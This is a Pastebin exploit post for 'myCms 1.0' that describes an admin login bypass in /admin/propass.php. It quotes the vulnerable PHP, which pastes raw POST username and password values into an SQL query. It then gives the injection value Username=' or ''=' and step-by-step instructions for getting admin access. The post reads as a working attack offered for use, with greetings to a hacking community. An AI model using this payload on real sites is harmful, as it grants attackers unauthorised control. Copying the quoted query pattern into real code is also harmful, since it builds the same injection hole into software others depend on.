Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ###########################################
- ###### myCms 1.0 Admin-Login-Bypass #######
- ########### Found by IP-Sh0k ##############
- ### greetings to err000r^ and the whole ###
- ######### Back2Hack.cc community ##########
- ###########################################
- #
- # Vulnerable file: /admin/propass.php
- #
- ###########################################
- #
- # Vulnerable code:
- #
- # $luser = $_POST['Username'];
- # $lpass = $_POST['Password'];
- #
- # $sql = "SELECT * FROM account WHERE Usern = '$luser' and Passn = '$lpass'";
- # $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
- #
- # while($result = mysql_fetch_array($query)) {
- # $ID = stripslashes($result["AID"]);
- # setcookie("ID",$ID,time()+3600);
- #
- # header("Location: mainf.php");
- #
- ###########################################
- #
- # Bypass:
- #
- # 1. Set postdata to: Username=' or ''='&Password=empty
- # 2. and go to /admin/propass.php (now the cookies will be set)
- # 3. Go to /admin/
- # 4. Now you're logged in as admin
- #
- ###########################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement